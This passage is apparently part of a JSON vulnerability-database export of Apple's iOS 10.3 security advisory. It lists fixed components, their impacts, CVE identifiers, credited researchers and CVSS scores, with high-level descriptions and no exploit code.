later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, natashenka of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. 
This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory 
management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of iOS 10.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2380", "CVE-2017-2384", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2390", "CVE-2017-2393", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2397", "CVE-2017-2398", "CVE-2017-2399", "CVE-2017-2400", "CVE-2017-2401", "CVE-2017-2404", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2412", "CVE-2017-2414", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2423", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2434", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", 
"CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2452", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2457", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2484", "CVE-2017-2485", "CVE-2017-2486", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029", "CVE-2017-6976"], "modified": "2017-03-27T00:00:00", "id": "APPLE:218B65DBD8E421B171C5CC7639BE893D", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:31", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. 
This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous 
researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. 
This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: 
iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian 
Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. 
This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. 
This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. 
This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. 
This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: A validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and 
later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's 